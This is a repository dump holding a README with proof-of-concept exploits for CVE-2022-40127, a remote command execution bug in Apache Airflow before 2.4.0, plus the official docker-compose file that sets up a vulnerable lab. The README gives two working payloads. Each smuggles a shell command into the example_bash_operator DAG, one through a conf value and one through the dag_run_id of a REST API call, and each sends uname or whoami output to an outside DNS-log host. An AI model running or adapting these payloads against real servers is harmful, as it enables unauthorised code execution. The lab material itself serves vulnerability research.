├── README.md
└── docker-compose.yaml
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2022-40127
2 | Apache Airflow < 2.4.0 DAG example_bash_operator RCE
3 |
4 | # poc docker env:
5 |
6 | ```
7 | mkdir CVE-2022-40127 && cd CVE-2022-40127
8 | curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
9 | #or wget https://github.com/Mr-xn/CVE-2022-40127/raw/main/docker-compose.yaml
10 | mkdir -p ./dags ./logs ./plugins
11 | echo -e "AIRFLOW_UID=$(id -u)" > .env
12 | docker-compose up airflow-init
13 | docker-compose up -d
14 | #waiting some times
15 | open localhost:8080
16 | ```
17 |
18 | # POC 1
19 |
20 | example_bash_operator
21 |
22 | ```
23 | {"fxoxx":"\";curl `uname`.lxx2.535ld4zn.dnslog.pw;\""}
24 | ```
25 |
26 |
27 |
28 | ## dnslog via
29 |
30 |
31 |
32 |
33 | # POC 2
34 |
35 | ```
36 | curl -X 'POST' \
37 | 'http://10.11.12.131:8080/api/v1/dags/example_bash_operator/dagRuns' \
38 | -H 'accept: application/json' \
39 | -H 'Content-Type: application/json' \
40 | -d '{
41 | "conf": {
42 | "dag_run": "api2"
43 | },
44 | "dag_run_id": "id \"&& curl `whoami`.api222.535ld4zn.dnslog.pw",
45 | "logical_date": "2022-11-19T10:13:13.920Z"
46 |
47 | }'
48 | ```
49 |
50 | http://localhost:8080/redoc#tag/DAGRun/operation/post_dag_run
51 |
52 |
53 | http://localhost:8080/api/v1/ui/#/DAGRun/post_dag_run
54 |
55 |
56 |
57 |
58 | ## dnslog via
59 |
60 |
61 |
62 |
63 | commit:
64 |
65 | https://github.com/apache/airflow/pull/25960/files#diff-7c35dc3aa6659f910139c28057dfc663dd886dd0dfb3d8a971603c2ae7790d2a
66 |
67 | links:
68 |
69 | https://stackoverflow.com/questions/67110383/how-to-trigger-airflow-dag-with-rest-api-i-get-property-is-read-only-state
70 |
--------------------------------------------------------------------------------
/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | # Licensed to the Apache Software Foundation (ASF) under one
2 | # or more contributor license agreements. See the NOTICE file
3 | # distributed with this work for additional information
4 | # regarding copyright ownership. The ASF licenses this file
5 | # to you under the Apache License, Version 2.0 (the
6 | # "License"); you may not use this file except in compliance
7 | # with the License. You may obtain a copy of the License at
8 | #
9 | # http://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing,
12 | # software distributed under the License is distributed on an
13 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
14 | # KIND, either express or implied. See the License for the
15 | # specific language governing permissions and limitations
16 | # under the License.
17 | #
18 |
19 | # Basic Airflow cluster configuration for CeleryExecutor with Redis and PostgreSQL.
20 | #
21 | # WARNING: This configuration is for local development. Do not use it in a production deployment.
22 | #
23 | # This configuration supports basic configuration using environment variables or an .env file
24 | # The following variables are supported:
25 | #
26 | # AIRFLOW_IMAGE_NAME - Docker image name used to run Airflow.
27 | # Default: apache/airflow:2.3.4
28 | # AIRFLOW_UID - User ID in Airflow containers
29 | # Default: 50000
30 | # Those configurations are useful mostly in case of standalone testing/running Airflow in test/try-out mode
31 | #
32 | # _AIRFLOW_WWW_USER_USERNAME - Username for the administrator account (if requested).
33 | # Default: airflow
34 | # _AIRFLOW_WWW_USER_PASSWORD - Password for the administrator account (if requested).
35 | # Default: airflow
36 | # _PIP_ADDITIONAL_REQUIREMENTS - Additional PIP requirements to add when starting all containers.
37 | # Default: ''
38 | #
39 | # Feel free to modify this file to suit your needs.
40 | ---
41 | version: '3'
42 | x-airflow-common:
43 | &airflow-common
44 | # In order to add custom dependencies or upgrade provider packages you can use your extended image.
45 | # Comment the image line, place your Dockerfile in the directory where you placed the docker-compose.yaml
46 | # and uncomment the "build" line below, Then run `docker-compose build` to build the images.
47 | image: ${AIRFLOW_IMAGE_NAME:-apache/airflow:2.3.4}
48 | # build: .
49 | environment:
50 | &airflow-common-env
51 | AIRFLOW__CORE__EXECUTOR: CeleryExecutor
52 | AIRFLOW__DATABASE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
53 | # For backward compatibility, with Airflow <2.3
54 | AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
55 | AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
56 | AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
57 | AIRFLOW__CORE__FERNET_KEY: ''
58 | AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
59 | AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
60 | AIRFLOW__API__AUTH_BACKENDS: 'airflow.api.auth.backend.basic_auth'
61 | _PIP_ADDITIONAL_REQUIREMENTS: ${_PIP_ADDITIONAL_REQUIREMENTS:-}
62 | volumes:
63 | - ./dags:/opt/airflow/dags
64 | - ./logs:/opt/airflow/logs
65 | - ./plugins:/opt/airflow/plugins
66 | user: "${AIRFLOW_UID:-50000}:0"
67 | depends_on:
68 | &airflow-common-depends-on
69 | redis:
70 | condition: service_healthy
71 | postgres:
72 | condition: service_healthy
73 |
74 | services:
75 | postgres:
76 | image: postgres:13
77 | environment:
78 | POSTGRES_USER: airflow
79 | POSTGRES_PASSWORD: airflow
80 | POSTGRES_DB: airflow
81 | volumes:
82 | - postgres-db-volume:/var/lib/postgresql/data
83 | healthcheck:
84 | test: ["CMD", "pg_isready", "-U", "airflow"]
85 | interval: 5s
86 | retries: 5
87 | restart: always
88 |
89 | redis:
90 | image: redis:latest
91 | expose:
92 | - 6379
93 | healthcheck:
94 | test: ["CMD", "redis-cli", "ping"]
95 | interval: 5s
96 | timeout: 30s
97 | retries: 50
98 | restart: always
99 |
100 | airflow-webserver:
101 | <<: *airflow-common
102 | command: webserver
103 | ports:
104 | - 8080:8080
105 | healthcheck:
106 | test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
107 | interval: 10s
108 | timeout: 10s
109 | retries: 5
110 | restart: always
111 | depends_on:
112 | <<: *airflow-common-depends-on
113 | airflow-init:
114 | condition: service_completed_successfully
115 |
116 | airflow-scheduler:
117 | <<: *airflow-common
118 | command: scheduler
119 | healthcheck:
120 | test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
121 | interval: 10s
122 | timeout: 10s
123 | retries: 5
124 | restart: always
125 | depends_on:
126 | <<: *airflow-common-depends-on
127 | airflow-init:
128 | condition: service_completed_successfully
129 |
130 | airflow-worker:
131 | <<: *airflow-common
132 | command: celery worker
133 | healthcheck:
134 | test:
135 | - "CMD-SHELL"
136 | - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
137 | interval: 10s
138 | timeout: 10s
139 | retries: 5
140 | environment:
141 | <<: *airflow-common-env
142 | # Required to handle warm shutdown of the celery workers properly
143 | # See https://airflow.apache.org/docs/docker-stack/entrypoint.html#signal-propagation
144 | DUMB_INIT_SETSID: "0"
145 | restart: always
146 | depends_on:
147 | <<: *airflow-common-depends-on
148 | airflow-init:
149 | condition: service_completed_successfully
150 |
151 | airflow-triggerer:
152 | <<: *airflow-common
153 | command: triggerer
154 | healthcheck:
155 | test: ["CMD-SHELL", 'airflow jobs check --job-type TriggererJob --hostname "$${HOSTNAME}"']
156 | interval: 10s
157 | timeout: 10s
158 | retries: 5
159 | restart: always
160 | depends_on:
161 | <<: *airflow-common-depends-on
162 | airflow-init:
163 | condition: service_completed_successfully
164 |
165 | airflow-init:
166 | <<: *airflow-common
167 | entrypoint: /bin/bash
168 | # yamllint disable rule:line-length
169 | command:
170 | - -c
171 | - |
172 | function ver() {
173 | printf "%04d%04d%04d%04d" $${1//./ }
174 | }
175 | airflow_version=$$(AIRFLOW__LOGGING__LOGGING_LEVEL=INFO && gosu airflow airflow version)
176 | airflow_version_comparable=$$(ver $${airflow_version})
177 | min_airflow_version=2.2.0
178 | min_airflow_version_comparable=$$(ver $${min_airflow_version})
179 | if (( airflow_version_comparable < min_airflow_version_comparable )); then
180 | echo
181 | echo -e "\033[1;31mERROR!!!: Too old Airflow version $${airflow_version}!\e[0m"
182 | echo "The minimum Airflow version supported: $${min_airflow_version}. Only use this or higher!"
183 | echo
184 | exit 1
185 | fi
186 | if [[ -z "${AIRFLOW_UID}" ]]; then
187 | echo
188 | echo -e "\033[1;33mWARNING!!!: AIRFLOW_UID not set!\e[0m"
189 | echo "If you are on Linux, you SHOULD follow the instructions below to set "
190 | echo "AIRFLOW_UID environment variable, otherwise files will be owned by root."
191 | echo "For other operating systems you can get rid of the warning with manually created .env file:"
192 | echo " See: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html#setting-the-right-airflow-user"
193 | echo
194 | fi
195 | one_meg=1048576
196 | mem_available=$$(($$(getconf _PHYS_PAGES) * $$(getconf PAGE_SIZE) / one_meg))
197 | cpus_available=$$(grep -cE 'cpu[0-9]+' /proc/stat)
198 | disk_available=$$(df / | tail -1 | awk '{print $$4}')
199 | warning_resources="false"
200 | if (( mem_available < 4000 )) ; then
201 | echo
202 | echo -e "\033[1;33mWARNING!!!: Not enough memory available for Docker.\e[0m"
203 | echo "At least 4GB of memory required. You have $$(numfmt --to iec $$((mem_available * one_meg)))"
204 | echo
205 | warning_resources="true"
206 | fi
207 | if (( cpus_available < 2 )); then
208 | echo
209 | echo -e "\033[1;33mWARNING!!!: Not enough CPUS available for Docker.\e[0m"
210 | echo "At least 2 CPUs recommended. You have $${cpus_available}"
211 | echo
212 | warning_resources="true"
213 | fi
214 | if (( disk_available < one_meg * 10 )); then
215 | echo
216 | echo -e "\033[1;33mWARNING!!!: Not enough Disk space available for Docker.\e[0m"
217 | echo "At least 10 GBs recommended. You have $$(numfmt --to iec $$((disk_available * 1024 )))"
218 | echo
219 | warning_resources="true"
220 | fi
221 | if [[ $${warning_resources} == "true" ]]; then
222 | echo
223 | echo -e "\033[1;33mWARNING!!!: You have not enough resources to run Airflow (see above)!\e[0m"
224 | echo "Please follow the instructions to increase amount of resources available:"
225 | echo " https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html#before-you-begin"
226 | echo
227 | fi
228 | mkdir -p /sources/logs /sources/dags /sources/plugins
229 | chown -R "${AIRFLOW_UID}:0" /sources/{logs,dags,plugins}
230 | exec /entrypoint airflow version
231 | # yamllint enable rule:line-length
232 | environment:
233 | <<: *airflow-common-env
234 | _AIRFLOW_DB_UPGRADE: 'true'
235 | _AIRFLOW_WWW_USER_CREATE: 'true'
236 | _AIRFLOW_WWW_USER_USERNAME: ${_AIRFLOW_WWW_USER_USERNAME:-airflow}
237 | _AIRFLOW_WWW_USER_PASSWORD: ${_AIRFLOW_WWW_USER_PASSWORD:-airflow}
238 | _PIP_ADDITIONAL_REQUIREMENTS: ''
239 | user: "0:0"
240 | volumes:
241 | - .:/sources
242 |
243 | airflow-cli:
244 | <<: *airflow-common
245 | profiles:
246 | - debug
247 | environment:
248 | <<: *airflow-common-env
249 | CONNECTION_CHECK_MAX_COUNT: "0"
250 | # Workaround for entrypoint issue. See: https://github.com/apache/airflow/issues/16252
251 | command:
252 | - bash
253 | - -c
254 | - airflow
255 |
256 | # You can enable flower by adding "--profile flower" option e.g. docker-compose --profile flower up
257 | # or by explicitly targeted on the command line e.g. docker-compose up flower.
258 | # See: https://docs.docker.com/compose/profiles/
259 | flower:
260 | <<: *airflow-common
261 | command: celery flower
262 | profiles:
263 | - flower
264 | ports:
265 | - 5555:5555
266 | healthcheck:
267 | test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
268 | interval: 10s
269 | timeout: 10s
270 | retries: 5
271 | restart: always
272 | depends_on:
273 | <<: *airflow-common-depends-on
274 | airflow-init:
275 | condition: service_completed_successfully
276 |
277 | volumes:
278 | postgres-db-volume:
279 |
--------------------------------------------------------------------------------